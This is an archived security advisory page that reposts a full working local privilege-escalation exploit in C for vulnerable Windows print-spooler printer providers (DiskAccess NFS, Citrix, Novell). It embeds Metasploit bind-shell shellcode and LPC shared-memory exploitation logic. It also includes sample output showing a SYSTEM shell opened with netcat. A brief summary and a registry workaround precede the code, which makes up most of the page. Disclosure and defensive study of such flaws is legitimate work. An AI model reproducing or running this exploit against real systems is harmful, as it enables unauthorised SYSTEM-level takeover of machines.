Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
Ask the Team  Mailing Lists  Advertising Info  Advisories  About SecuriTeam  Blogs Brought to you by: Suppliers of: Website Testing Tools Network Testing Tools Software Testing Tools SecuriTeam in Your Inbox New vulnerability? New tool? Tell us (Our PGP key). CanSecWest 2012 2nd Annual Cyber Security Hack In Paris	Universal Exploit for Vulnerable Printer Providers (Spooler Service) 29 Jan. 2007    Summary A vulnerability in the way Printer Providers work allow local attackers to cause the to crash and potentially execute arbitrary code. The following exploit code can be used to test your system.   Credit: The information has been provided by Andres Tarasco Acuca. The original article can be found at: http://www.514.es Website Security Scan Code Vulnerability Test Network Assessment Tool Detect hidden vulnerabilities Exhaustive automated testing Real-time, continuous security Get guidance from professionals of internal or 3rd party code. scanning for your entire network    Details Protect your website! Use an External Vulnerability Scanner! Nothing to install. First report in 1 hour! www.beyondsecurity.com/vulnerability-scanner Exploit: /********************Private exploit- internal use only*****************  Title: Universal exploit for vulnerable printer providers (spooler service).  Vulnerability: Insecure EnumPrintersW() calls  Author: Andres Tarasco Acu a - atarasco@514.es  Website: http://www.514.es    This code should allow to gain SYSTEM privileges with the following software:  blink !blink! blink!  - DiskAccess NFS Client (dapcnfsd.dll v0.6.4.0) - REPORTED & NOTFIXED -0day!!!  - Citrix Metaframe - cpprov.dll - FIXED  - Novell (nwspool.dll - CVE-2006-5854 - untested)  - More undisclosed stuff =)   If this code crashes your spooler service (spoolsv.exe) check your   "vulnerable" printer providers at:   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Providers   Workaround: Trust only default printer providers "Internet Print Provider"   and "LanMan Print Services" and delete the other ones.     And remember, if it doesnt work for you, tweak it yourself. Do not ask   D:\Programaci n\EnumPrinters\Exploits>testlpc.exe  [+] Citrix Presentation Server - EnumPrinterW() Universal exploit  [+] Exploit coded by Andres Tarasco - atarasco@514.es    [+] Connecting to spooler LCP port \RPC Control\spoolss  [+] Trying to locate valid address (1 tries)  [+] Mapped memory. Client address: 0x003d0000  [+] Mapped memory. Server address: 0x00a70000  [+] Targeting return address to : 0x00A700A7  [+] Writting to shared memory...  [+] Written 0x1000 bytes  [+] Exploiting vulnerability....  [+] Exploit complete. Now Connect to 127.0.0.1:51477    D:\Programaci n\EnumPrinters>nc localhost 51477  Microsoft Windows XP [Versi n 5.1.2600]  (C) Copyright 1985-2001 Microsoft Corp.  C:\WINDOWS\system32>whoami  NT AUTHORITY\SYSTEM   514 ownz u  ********************Private exploit- internal use only*****************/ #include <stdio.h> #include <windows.h> #include <Winspool.h> #pragma comment(lib,"Winspool.lib") #define REQUIRED_SIZE 0x1000 unsigned char shellcode[] = /*Just a metasploit shellcode - Bindshell 51477 */ "\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe6" "\xc0\xc6\x10\x83\xeb\xfc\xe2\xf4\x1a\xaa\x2d\x5d\x0e\x39\x39\xef" "\x19\xa0\x4d\x7c\xc2\xe4\x4d\x55\xda\x4b\xba\x15\x9e\xc1\x29\x9b" "\xa9\xd8\x4d\x4f\xc6\xc1\x2d\x59\x6d\xf4\x4d\x11\x08\xf1\x06\x89" "\x4a\x44\x06\x64\xe1\x01\x0c\x1d\xe7\x02\x2d\xe4\xdd\x94\xe2\x38" "\x93\x25\x4d\x4f\xc2\xc1\x2d\x76\x6d\xcc\x8d\x9b\xb9\xdc\xc7\xfb" "\xe5\xec\x4d\x99\x8a\xe4\xda\x71\x25\xf1\x1d\x74\x6d\x83\xf6\x9b" "\xa6\xcc\x4d\x60\xfa\x6d\x4d\x50\xee\x9e\xae\x9e\xa8\xce\x2a\x40" "\x19\x16\xa0\x43\x80\xa8\xf5\x22\x8e\xb7\xb5\x22\xb9\x94\x39\xc0" "\x8e\x0b\x2b\xec\xdd\x90\x39\xc6\xb9\x49\x23\x76\x67\x2d\xce\x12" "\xb3\xaa\xc4\xef\x36\xa8\x1f\x19\x13\x6d\x91\xef\x30\x93\x95\x43" "\xb5\x93\x85\x43\xa5\x93\x39\xc0\x80\xa8\x0f\x05\x80\x93\x4f\xf1" "\x73\xa8\x62\x0a\x96\x07\x91\xef\x30\xaa\xd6\x41\xb3\x3f\x16\x78" "\x42\x6d\xe8\xf9\xb1\x3f\x10\x43\xb3\x3f\x16\x78\x03\x89\x40\x59" "\xb1\x3f\x10\x40\xb2\x94\x93\xef\x36\x53\xae\xf7\x9f\x06\xbf\x47" "\x19\x16\x93\xef\x36\xa6\xac\x74\x80\xa8\xa5\x7d\x6f\x25\xac\x40" "\xbf\xe9\x0a\x99\x01\xaa\x82\x99\x04\xf1\x06\xe3\x4c\x3e\x84\x3d" "\x18\x82\xea\x83\x6b\xba\xfe\xbb\x4d\x6b\xae\x62\x18\x73\xd0\xef" "\x93\x84\x39\xc6\xbd\x97\x94\x41\xb7\x91\xac\x11\xb7\x91\x93\x41" "\x19\x10\xae\xbd\x3f\xc5\x08\x43\x19\x16\xac\xef\x19\xf7\x39\xc0" "\x6d\x97\x3a\x93\x22\xa4\x39\xc6\xb4\x3f\x16\x78\x16\x4a\xc2\x4f" "\xb5\x3f\x10\xef\x36\xc0\xc6\x10"; typedef struct _UNICODE_STRING {   USHORT Length;   USHORT MaximumLength;   PWSTR Buffer; } UNICODE_STRING; typedef struct LpcSectionMapInfo{         DWORD Length;         DWORD SectionSize;         DWORD ServerBaseAddress; } LPCSECTIONMAPINFO; typedef struct LpcSectionInfo {         DWORD Length;         HANDLE SectionHandle;         DWORD Param1;         DWORD SectionSize;         DWORD ClientBaseAddress;         DWORD ServerBaseAddress; } LPCSECTIONINFO; #define SHARED_SECTION_SIZE 0x1000 typedef struct _OBJDIR_INFORMATION {   UNICODE_STRING ObjectName;   UNICODE_STRING ObjectTypeName;   BYTE Data[1]; } OBJDIR_INFORMATION; typedef struct _OBJECT_ATTRIBUTES {     ULONG Length;     HANDLE RootDirectory;     UNICODE_STRING *ObjectName;     ULONG Attributes;     PVOID SecurityDescriptor;     PVOID SecurityQualityOfService; } OBJECT_ATTRIBUTES; #define InitializeObjectAttributes( p, n, a, r, s ) { \     (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \     (p)->RootDirectory = r; \     (p)->Attributes = a; \     (p)->ObjectName = n; \     (p)->SecurityDescriptor = s; \     (p)->SecurityQualityOfService = NULL; \     } typedef DWORD (WINAPI *NTCREATESECTION)(    HANDLE* SectionHandle,    unsigned long DesiredAccess,    OBJECT_ATTRIBUTES *ObjectAttributes,    PLARGE_INTEGER MaximumSize,    unsigned long PageAttributess,    unsigned long SectionAttributes,    HANDLE FileHandle); typedef DWORD (WINAPI *NTCONNECTPORT)(    HANDLE *ClientPortHandle,    UNICODE_STRING *ServerPortName,    SECURITY_QUALITY_OF_SERVICE *SecurityQos,    DWORD *ClientSharedMemory,    DWORD *ServerSharedMemory,    DWORD *MaximumMessageLength,    DWORD *ConnectionInfo OPTIONAL,    DWORD *ConnectionInfoLength); LARGE_INTEGER ConnectToLPCPort(void){    /* Thanks goes to Cesar Cerrudo for the WLSI paper */  HANDLE hPort;  LPCSECTIONINFO sectionInfo;  LPCSECTIONMAPINFO mapInfo;  byte ConnectDataBuffer[100];  DWORD Size = sizeof(ConnectDataBuffer);    WCHAR * uString=L"\\RPC Control\\spoolss";  DWORD i;  UNICODE_STRING uStr;    LARGE_INTEGER ret;        NTCONNECTPORT NtConnectPort;    NTCREATESECTION NtCreateSection;    ret.QuadPart=0;  for (i=0;i<100;i++)   ConnectDataBuffer[i]=0x0;    NtConnectPort= (NTCONNECTPORT)GetProcAddress(GetModuleHandle("NTDLL.DLL"), "NtConnectPort");    NtCreateSection= (NTCREATESECTION)GetProcAddress(GetModuleHandle("NTDLL.DLL"), "NtCreateSection");    if ( (!NtConnectPort) || (!NtCreateSection) ) {       printf("[-] Error Loading functions\n");    } else {     HANDLE hSection;     LARGE_INTEGER SecSize;     DWORD maxSize=0;     SECURITY_QUALITY_OF_SERVICE qos;       DWORD qosSize=4;       //create shared section       SecSize.LowPart=REQUIRED_SIZE;//0x1000;     SecSize.HighPart=0x0;     qos.Length =(DWORD)&qosSize;     qos.ImpersonationLevel =SecurityIdentification;     qos.ContextTrackingMode =0x01000101;     qos.EffectiveOnly =0x10000;          NtCreateSection(&hSection,SECTION_ALL_ACCESS,NULL,&SecSize,PAGE_READWRITE,SEC_COMMIT ,NULL);              //connect to lpc     memset(§ionInfo, 0, sizeof(sectionInfo));     memset(&mapInfo, 0, sizeof(mapInfo));     sectionInfo.Length = 0x18;     sectionInfo.SectionHandle =hSection;     sectionInfo.SectionSize = SHARED_SECTION_SIZE;     mapInfo.Length = 0x0C;     uStr.Length = wcslen(uString)*2;     uStr.MaximumLength = wcslen(uString)*2+2;     uStr.Buffer =uString;       //connect to LPC port     if (!NtConnectPort(&hPort,&uStr,&qos,(DWORD *)§ionInfo,(DWORD *)&mapInfo,&maxSize,(DWORD*)ConnectDataBuffer,&Size)){          ret.LowPart=sectionInfo.ClientBaseAddress ;          ret.HighPart=sectionInfo.ServerBaseAddress;       }    }  return(ret); } #define BOFSIZE 300 //Change it if size needed more to exploit you printer provider   int main(int argc, char* argv[]) {      unsigned char exploit[BOFSIZE];   unsigned char buffer[REQUIRED_SIZE];   DWORD dwSizeNeeded,n=0;   DWORD datalen=REQUIRED_SIZE;   LARGE_INTEGER dirs;   HANDLE hProcess;   DWORD write;   char *p,i;   #define lpLocalAddress dirs.LowPart   #define lpTargetAddress dirs.HighPart   printf("[+] Universal exploit for printer spooler providers\n");   printf("[+] Some Citrix metaframe, DiskAccess and Novel versions are affected\n");   printf("[+] Exploit by Andres Tarasco - atarasco@514.es\n\n");   printf("[+] Connecting to spooler LCP port \\RPC Control\\spoolss\n");   printf("[+] Trying to locate valid address");     do {    dirs=ConnectToLPCPort();    if (lpLocalAddress==0){   printf("[-] Unable to connect to spooler LPC port\n");     printf("[-] Check if the service is running\n");   exit(0);    }    i=lpTargetAddress>>24; // & 0xFF000000 == 0    n++;    if (n==100) {       printf("\n[-] Unable to locate a valid address after %i tries\n",n);       printf("[?] Maybe a greater REQUIRED_SIZE should help. Try increasing it\n");       return(0);    }   }while (i!=0);      printf(" (%i tries)\n",n);   printf("[+] Mapped memory. Client address: 0x%8.8x\n",lpLocalAddress);   printf("[+] Mapped memory. Server address: 0x%8.8x\n",lpTargetAddress);     i=(lpTargetAddress<<8)>>24;   //Fill all with rets. who cares where is it.   memset(exploit,i,sizeof(exploit));   exploit[sizeof(exploit)-1]='\0';   /*   memset(exploit,'A',sizeof(exploit)-1);   exploit[262]= (lpTargetAddress<<8)>>24; //EIP for Diskaccess   exploit[263]= (lpTargetAddress<<8)>>24; //EIP for Diskaccess   exploit[264]='\0';   */      printf("[+] Targeting return address to : 0x00%2.2X00%2.2X\n",exploit[262],exploit[262]);   p=(char *)lpLocalAddress;   memset(&buffer[0],0x90,sizeof(buffer)-1);   memcpy(&buffer[sizeof(buffer)-sizeof(shellcode)-10],shellcode,sizeof(shellcode));      printf("[+] Writting to shared memory...\n");   if ( (hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, GetCurrentProcessId()))!= NULL )   {     if ( WriteProcessMemory( hProcess, p, &buffer[0], REQUIRED_SIZE, &write )!=0 )     {       printf("[+] Written 0x%x bytes \n",write);       printf("[+] Exploiting vulnerability....\n");       printf("[+] Exploit complete. Now try to connect to 127.0.0.1:51477\n");       printf("[+] and check if you are system =)\n");       EnumPrintersA ( PRINTER_ENUM_NAME, (char *)exploit, 1, NULL, 0, &dwSizeNeeded, &n );       return(1);     }   }   printf("[+] Something failed. Good luck next time\n");   return(0); } // milw0rm.com [2007-01-29]  Comments: blog comments powered by Disqus	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews  Related Articles Microsoft Windows shmedia.dll Division By Zero, Explore.exe DOS Exploit IGSS 8 ODBC Server Multiple Remote Uninitialized Pointer Free DoS Progea Movicon TCPUploadServer Remote Exploit Trango Broadband Wireless Rogue SU Authentication Bug Exposing HMS HICP Protocol and Intellicom NetBiterConfig.exe Remote Buffer Overflow Family Connections Multiple Remote Vulnerabilities VideoCache vccleaner Root Vulnerability QuickHeal Antivirus 2010 Local Privilege Escalation DubSite CMS Cross Site Request Forgery Vulnerability SonicWall Global Management System XSS Vulnerability Sonicwall NSA E7500 XSS Vulnerability Juniper Security Threat Response Manager XSS Vulnerability Hacking CSRF Tokens using CSS History Hack Sun Java System Identiy Manager Users Enumeration Microsoft Internet Explorer XML Buffer Overflow (Exploit)  Featured Articles ProFTPD Response Pool Use-After-Free Code Execution Vulnerability HP Data Protector Notebook Extension LogClientInstallation SQL Injection Vulnerabilty GE Proficy Historian ihDataArchiver.exe Trusted Header Size Code Execution Vulnerability Novell ZENWorks Software Packaging Antique ActiveX Control Code Execution Vulnerability Adobe Reader U3D IFF RGBA Parsing Code Execution Vulnerability Adobe Reader U3D PCX Parsing Code Execution Vulnerability Cisco Unified Service Monitor brstart add_dm Code Execution Vulnerability
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs

Copyright © 1998-2011 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®